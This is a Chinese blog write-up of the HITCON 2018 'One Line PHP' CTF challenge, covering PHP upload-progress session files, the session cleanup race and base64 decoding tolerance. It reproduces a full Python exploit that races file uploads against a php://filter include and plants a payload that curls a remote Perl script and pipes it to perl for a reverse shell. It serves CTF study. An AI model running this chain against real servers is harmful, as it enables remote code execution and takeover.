hitcon 2018 One Line PHP Challenge

2024年8月18日01:22:46评论12 views字数 2657阅读8分51秒阅读模式

前段时间打了个神仙比赛，全程挂机，tqltql
这里记录一下复现好吧
题目很简单，就一行
hitcon 2018 One Line PHP Challenge
这题看过去没有什么头绪，后来看到wp才知道原来是考session的漏洞。

session的问题

php检查session是否要处理是通过session.auto_start或者session_start()，但是默认情况下session.auto_start的Off的，而代码如果没有session_start()也是没有开启session的，但是如果用PHP_SESSION_UPLOAD_PROGRESS在多部分POST数据里就可以开启session了
这里我建了个php文件去测试，我在html文件夹下放了一个123.php，里面什么代码都没有，然后在linux shell里面输入下面的语句

$ curl http://vps_ip/123.php -H 'Cookie: PHPSESSID=hhh'
$ ls -a /var/lib/php/sessions
. ..
$ curl http://vps_ip/123.php -H 'Cookie: PHPSESSID=hhh' -d 'PHP_SESSION_UPLOAD_PROGRESS=blabalbal'
$ ls -a /var/lib/php/sessions
. ..
$ curl http://vps_ip/123.php -H 'Cookie: PHPSESSID=hhh' -F 'PHP_SESSION_UPLOAD_PROGRESS=blabalbal' -F 'file=@/etc/passwd'
$ ls -a /var/lib/php/sessions
. .. sess_hhh

hitcon 2018 One Line PHP Challenge
可以看到，确实是有一个session是hhh。

session会被清除的问题

但是这里还有个问题，我们在自己的Linux上测试是可以保存了session文件的，但是hitcon可不可以保存session文件呢
hitcon 2018 One Line PHP Challenge
开发手册可以看见，cleanup默认是开启的，所以我们想将session文件保留下来，就要用到条件竞争，或者上传一个很大的文件去一直保留进度，让session一直存活。

session的利用

好了，到了现在，我们可以保证session里面肯定是有一个文件是我们自己上传进去的了，现在我们来看下那个文件
hitcon 2018 One Line PHP Challenge
好的，upload_progress后面的是可控的，但是还有一个问题，我们想要去掉前面的upload_progress怎么办呢，这里就要用到base64的容错了

base64容错利用

我们知道，base64只会解密[a-zA-Z0-9]，但是，如果里面有不合法的字符的时候，他还是可以把正确的字符连接在一起去进行加密的
举个栗子
hitcon 2018 One Line PHP Challenge
看个代码

$i = 0 ;
$data = "upload_progress_ZZ";
while(true){
    $i += 1;
    $data = base64_decode($data);
    var_dump($data);
    echo '<br>';
    if($data == ''){
        echo "解密次数: ".$i."\n";
        break;
    }
}

hitcon 2018 One Line PHP Challenge
可以看见，加了两个字母以后，upload_progress在经过三次解密后就没有了，所以我们想改掉前缀只需要对信息base64加密三次传输就行了
最后给个orange师傅的exp

import sys
import string
import requests
from base64 import b64encode
from random import sample, randint
from multiprocessing.dummy import Pool as ThreadPool



HOST = 'http://54.250.246.238/'
sess_name = 'iamorange'

headers = {
    'Connection': 'close',
    'Cookie': 'PHPSESSID=' + sess_name
}

payload = '@<?php `curl orange.tw/w/bc.pl|perl -`;?>'


while 1:
    junk = ''.join(sample(string.ascii_letters, randint(8, 16)))
    x = b64encode(payload + junk)
    xx = b64encode(b64encode(payload + junk))
    xxx = b64encode(b64encode(b64encode(payload + junk)))
    if '=' not in x and '=' not in xx and '=' not in xxx:
        payload = xxx
        print payload
        break

def runner1(i):
    data = {
        'PHP_SESSION_UPLOAD_PROGRESS': 'ZZ' + payload + 'Z'
    }
    while 1:
        fp = open('/etc/passwd', 'rb')
        r = requests.post(HOST, files={'f': fp}, data=data, headers=headers)
        fp.close()

def runner2(i):
    filename = '/var/lib/php/sessions/sess_' + sess_name
    filename = 'php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s' % filename
    # print filename
    while 1:
        url = '%s?orange=%s' % (HOST, filename)
        r = requests.get(url, headers=headers)
        c = r.content
        if c and 'orange' not in c:
            print [c]


if sys.argv[0] == '1':
    runner = runner1
else:
    runner = runner2

pool = ThreadPool(32)
result = pool.map_async( runner, range(32) ).get(0xffff)

好了好了，总的来说这题考了条件竞争，session漏洞，base64容错机制，溜了溜了

FROM:Xi4or0uji

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

hitcon 2018 One Line PHP Challenge

session的问题

session会被清除的问题

session的利用

base64容错利用

综述合辑 | 《网络空间安全科学学报》综述论文（上）

通达OA 任意用户登录漏洞

Weblogic IIOP 反序列化漏洞学习笔记(CVE-2020-2551)

Python 定制QQ机器人

RocketMQ 5.1.1写计划任务RCE

Nacos Raft Hessian反序列化漏洞分析

Tabby学习笔记 & Java反序列化gadget分析

Apache Jena 代码执行漏洞(CVE-2023-22665)

Apache Archiva 任意目录删除(CVE-2022-40309) 和任意文件读取(CVE-2022-40308)

用CodeQL分析漏洞_CVE-2022-42889

发表评论

在线咨询

微信